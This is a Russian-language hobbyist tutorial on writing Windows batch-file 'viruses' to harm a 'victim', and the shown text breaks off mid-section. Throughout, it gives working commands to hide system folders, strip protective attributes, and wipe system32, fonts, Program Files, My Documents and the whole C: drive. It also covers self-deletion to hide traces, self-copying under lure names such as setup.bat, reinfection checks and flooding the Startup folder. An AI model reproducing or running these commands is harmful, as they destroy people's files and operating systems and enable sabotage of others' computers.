Т.е. у тебя было так: Текстовый документ. txt (по умолчанию)

А ты сделай вот так: Текстовый документ. bat (батовский)

Но вы не тупые и конечно же поняли что необязательно называть "текстовый документ.bat", можно к примеру назвать prikol.bat, или еще как нибудь. Ну там дальше работает фантазия...:) И оставьте пожалуйста Ваш комментарий в нашей гостевой книге! Нам будет очень интересно узнать Ваше мнение!

Первая статья про написание бат вирусов.

Итак, чтобы создать бат вирус нужно открыть блокнот написать команды,и сохранить с разрешением.bat К командам существуют и специальные параметры определяющие как команда будет выполняться. Вот например после команды start мы видим параметр /min - он запускает приложение, но в свёрнутом виде. Если за место него мы написали бы /max, то приложение соответственно запустилось во весь экран, развёрнутое. У команды start ещё есть с десяток параметров, но о них я вам говорить не стану т.к. они нам не чем не помогут (зачем нам задавать приоритет приложения?). В таблице написано приложение и команда которая его запускает:

Настройка системы- start msconfig

Калькулятор - calc

Помощь- start HelpCtr

Редактор символов- eudcedit

Таблица символов - charmap

Буфер обмена - clipbrd

Музон dvdplay

Диспетчер задач - taskmgr

Громкость -sndvol32

Доктор Ватсон -drwatson

Отладчик доктора- drwtsn32

Дефрагментация диска С: - defrag C:

Проверка диска - chkdsk

И ещё чтоб вы знали. Как же всё это выполняется, ведь команд куча, все они требуют приложения которое будет их выполнять. Неужели это всё одна программа? Нет, программа "cmd" служит для того чтобы через неё запускать другие программы. Вот например есть такая команда mem, введите её и увидите сведения о памяти вашего компа. Так вот, этой командой заправляет отдельное приложение. Оно так и называется mem. Лежит это приложение в C:WINDOWSsystem32 и есть ещё резервная копия по адресу: C:WINDOWSsystem32dllcache. Это для того чтобы восстановиться от нечаянного удаления нужных файлов. Так вот к чему рассказ, удалите в этих двух директориях приложение "mem.exe" и теперь введите в командную строку, вам не чего не покажут разве лишь только ошибку, или может даже то, что системного файла не хватает. Из этого следует вывод, если удалить приложения стирания, перемещения, то командные файлы у вас не сработают. Но я думаю "жертва" об этом даже не догадывается... Теперь приступим к написанию команд для человека, которому вы хотели бы сильно (или не очень сильно) навредить! Для начала напишем команду, которая не удаляет файлы, а просто ставит на них атрибут «Скрытый» и «Системный» и после запуска команды файлики исчезнут. Просто пишем:

attrib +h +s Используемые параметры в команде attrib:

+r Установка атрибута «Только чтение».

-r Снятие атрибута «Только чтение».

+a Установка атрибута «Архивный».

-a Снятие атрибута «Архивный».

+s Установка атрибута «Системный».

-s Снятие атрибута «Системный».

-h Снятие атрибута «Скрытый».

+h Установка атрибута «Скрытый».

Но мы будем только пользоваться двумя, может тремя. Давайте для начала скроем папку WINDOWS, чтобы перепуганный новичок орал «Х-де моя папка WINDOWS!» пишем:

attrib +h +s C:/WINDOWS

Или же можно скрыть файлы (вложенные папки остануться) в самой папке:

attrib +h +s C:/WINDOWS/*.*

можно поступить иначе:

cd C:windows переходим в папку «windows»
attrib +h +s и ставим атрибуты

У нас новая команда cd после неё пишем путь к директории и последующие команды будут применяться к этой папке. Почему надо ставить два атрибута? Достаточно поставить один "Скрытый" и он скроется? В принципе у ламера да, но если вы поставили в свойствах папки "Показывать скрытые файлы и папки", то фишка не прокатит, а с двумя параметрами файл можно только увидеть в FAR, или Commander (это файловые менеджеры).

А если мы хотим снять все атрибуты со всех файлов в этом каталоге, да и ещё и подкаталог? Для снятия или назначение атрибутов в подкаталоги надо воспользоваться параметром /s. Например для снятия всех атрибутов со всех файлов в этой папке и всех её подпапках пишем:

attrib -r -s -h -a *.* /s

Существует ещё одна загвоздка, а если на подпаке стоят атрибуты, то с неё команда снимет их? Нет, она не снимет не с этой папки, не с файлов которые в этой скрытой папке находятся. Поэтому нам нужен ещё один параметр для снятия атрибутов с папок /d. Например если мы хотим снять атрибуты ну со всего что только возможно в папки "Windows" нам надо написать:

attrib -r -s -h C:WINDOWS*.* /s /d

Ну не обязательно именно эта папка можно такую команду применить для других папок, например можно скрыть ненужный мусор, который следует удалить, а не как… ну об этом в главе: «Заполняем место мусором» Или какими он часто пользуется папками и файлами? Ну я думаю на "Рабочем столе" он держит кучу ярлыков. А если они исчезнут? Он их поставит опять, а мы сделаем запуск нашего вируса с каждым включением компа и сколько бы он раз заново не ставил свои ярлыки, они всё исчезают и исчезают,... но об этом потом.

Я думаю вы не станете биться в бешеном припадке если тестируя вирус скроете свои папки... Просто напишите команду которая снимает атрибуты...

Безвозвратное удаление

Ну что, сейчас пойдут команды удаления. Интуиция вам подсказывает что удаление это плохо...

del *.* /q

После запуска удалятся только файлы (не затронув папки) в той директории, где был запущен файл, т.е. запустили мы этот файл на рабочем столе, все ярлычки исчезли, но теперь уже навсегда. Если запустим файл в «Моих документах» то файлы исчезнут там. Но если поставить параметр /s то будет удаляться и в каталогах и подкаталогах. Параметр /q задаёт удаление без подтверждения. Теперь мы удалим шрифты:

Del C:windowsfonts /q

Почему без /s? А зачем, там нет подпапок. Правда не все шрифты удаляться системные останутся. Хоть откуда запускайте файл шрифты всё равно удаляться ведь указан путь… можно удалить хоть что вот, например:

Del C:windowsMedia /q

Удалит стандартную музыку, например: музыка при запуске системы или при ошибки.

Del C:windowssystem32 /q /s

Системная папка, ну я думаю, даже не стоит объяснять, что произойдёт после ликвидации файлов. Но есть один подвох если на файле будут стаять атрибуты "Скрытый" и "Системный" то наши удаление на них не подействует, их попросту пропустят. А вот как раз самые важные файлы то и отмечены этими параметрами (от нечаянного стирания). Что в этом случае делать? Придётся сначала писать команду снятия всех атрибутов с файлов, каталогов, подкаталога. Надеюсь вы помните главу "Хд-е мои файлы"? Командой del мы хоть и удаляем файлы, а папки то останутся, но есть команда которая стирает папки вместе с файлами:

rd C:windowsMedia /s /q и все папочки и файлики удаляться. Вы спросите, ну если команда rd так хороша, зачем нужна команда del? Ответ прост, вы попробуйте удалить командой rd, допустим только ярлыки рабочего стола, или только рисунки в папке windows. Командой del это делается так:

del C:windows*.bmp /q /s И нет стандартных рисунков, думаю понятно, почему удалены только рисунки ведь стоит маска.bmp если поставить.txt то удаляться текстовые файлы, об этом в главе "Маски" Файл можно ещё и просто не удаляя переместить, например:

move C:WINDOWS*.txt C:Text /y На команде видно что мы перемещаем все текстовые файлы в папку "Text" на диске C: (в папке WINDOWS их уже не будет, это же перемещение, где взяли там уже нет). Что интересно мы наносим такой же вред как и при удалении ведь комп будет считать что там этих файлов уже нет. (Правда удалять быстрее). Параметр /y выключает предупреждения о перезаписи, если вдруг имена совпадут.

А теперь попробуйте догадаться что попытается сделать эта команда:

Rd C: /s /q

И ещё напоследок чтобы хорошенько усвоили, комп не даёт вам просто так удалять системные и скрытые файлы, надо сначала снять все атрибуты. Иначе облом. Но этот процесс офигеть длительный так что лучше снимать только с определённых файлов, но это надо знать с каких. Так что чтобы написать вирус вам надо самим знать какие файлы системные и стандартные. Прочитать много книг и... убить Билла Гейца и занять его пост!

Премудрости удаления

 

Когда мы открываем диск С: мы видим не все файлы, которые там лежат, система их спрятала, для того чтобы их не тронул неопытный пользователь. Так вот раз они такие важные, а почему бы нам их не удалить… Сделать это можно в два шага, сначала снять с нашего секретного файла атрибут системный и скрытый, а то нам не кто не позволит нечего удалять, а потом возьмем и удалим всё НЕНУЖНОЕ, то есть самое необходимое:

attrib -a -s -h -r C:*.*
del C:*.* /q

Но тут нам много удалить не дадут. Всё триста раз защищено. Можно, например, попробовать удалить УСТАНОВЛЕНЫЕ НАМИ программы хранящиеся на диске! С:/ размахом сказал да? Ну, так вот если мы знаем, что все программы по умолчанию записываются в папку Program Files то можно, например, написать вот такую команду:

rd %ProgramFiles% /s /q А вот если написать:

rd C:Program Files /s /q то вирус не сработает заявив что таких папок он не нашёл? Каких таких? Наш вирус будет искать папку "Program" и папку "Files". Ладно у нас есть зарезервированая команда для папки Program Files - %programfiles%. А если мы хотим удалить "Мои документы". То вирус будет искать папки "Мои" и "Документы". В этом случае нам помогут двойные кавычки. Можно удалить содержимое «Моих документов» тем более многие хранят там самое важное: Chcp 1251 Р. Кодовая. стр. т.к. в команде Р. текст. del "%USERPROFILE%Мои документы*.*" /q /s

Важно! При установки операционки можно задать любую корневую папку и вы по команде cd C:WINDOWS не куда не попадёте. Может у него корневой каталог называется win? Нам поможет имя которое перебросит нас в корнивой каталог как бы он не назывался cd %SystemRoot%. Та же история с папкой пользователя как дойти до рабочего стола? cd "C:Documents and SettingsА тут чё писать????Рабочий стол" Видите где я вас спрашиваю "Тут чё писать" действительно ведь там стоит имя пользователя, угадать почти нереально. Поэтому надо написать cd %USERPROFILE%рабочий стол. Ну в папку Program Files мы уже знаем cd %programfiles% И не забывайте если есть в какой либо команде русские буквы например "Рабочий стол" или "Мои документы" обязательно в начале пишите команду Chcp 1251

А если мы хотим удалить в папке "Windows" только Текстовые файлы (txt) и Параметры конфигурации (ini), а на диске D: Рисунки (bmp)? Мы напишем три команды одна удаляет то, вторая это... Но можно всё это написать в одной команде: for %%Q in (C:WINDOWS*.txt *.ini D:*.bmp) do del %%Q Видно что мы можем написать свои пути в скобках, хоть какие, так же можем пользоваться масками разных комбинаций. А после слова do у нас стоит команда del так вот мы можем написать например attrib +h +s и теперь на диске С: скроются текстовые файлы и файлы ini. Ну суть понятна? В скобках пишем любой путь или пути, а после do любую команду (которую можно применить к файлу).

Теперь давайте предположим что мы сделали вирус, который при загрузке компа создаёт ненужный мусор. "Жертва" его удаляет, а он при загрузке появляется снова. А если "жертва" мусор не удалит? То наш тупой вирус будет его пытаться создать опять, может даже начнёт задавать "жертве" вопросы о перезаписи... "жертва" сразу обнаружит в чём дело и всё исправит. А давайте напишем команду которая проверяет, есть ли наш мусор на том месте где мы его создавали или уже нет. Если есть вирус завершиться. Если нет то сново создаст мусор.

if not VIR*?????????.sys goto x
exit
:x
МУСОР.

Помните как мы создавали мусор? Брали настоящие файлы копировали их с другим расширением и приписывали в начали приставку "VIR". Так вот наш вирус проверяет, есть ли хоть один файл у которого есть расширение.sys и приставка "VIR" в начале (можете писать что угодно, исходя из содержания вашего вируса). Если таковые имеются он выходит командой exit. Если таких нет, то переходит к точки x и создаёт мусор снова. Надеюсь вы понимаете что это только небольшой кусок кода вируса, например в начале должна стоять команда перехода в каталог, где будет всё проверяться... Где написано слово "МУСОР" должны быть написаны команды создования мусора. p>И ещё, я чё то всё говорю путь диск C:, диск C:, но для полной уверености можно я бы сказал НУЖНО прописать точно такие же команды и для диска D: (в этом же нашем файле вируса) и не только для D:, если не лень накатайте все буквы дисков. Т.к. некоторые умники меняют букву диска на "O"; "P"; "Q"; "R"; "S"; "T"; "U" или ещё какие (правильно делают). Безопасность, будь она не ладна. Маленькие команды Тут написаны команды для которых отдельная глава много...

Самоликвидация

Эта команда удаляет сама себя, пишите её в самом конце вашего вируса и всё, ни кто не узнает, что вы испортили на его компе чтобы сразу эту пакость не исправить.

del %0

Клонирование

Эта команда копирует себя в другое место. Так можно наклонироваться по всему диску, Нет, нет, да кто нибудь запустит интересный "setup" или "games"

copy %0 C:setup.bat
copy %0 D:games.bat
copy %0 C:windows/sex.bat ну и.т.д.

Можно изменить текущее время на своё:

Time 00:00

Можно изменить текущую дату:

Date 01.01.50

chcp 1251
cd "%USERPROFILE%Главное менюПрограммыАвтозагрузка"
md 1 ….и.т.д.

допустим мы создадим 100 пустых папок в папке "Автозагрузка" и при включение компа каждый раз будут открываться сотня папок, даааа так сдохнуть можно каждый раз их

Пытаемся повесить систему
Как я уже говорил в начальной главе чтобы запустить какую-нибудь программу надо написать start в начале строки и команду например: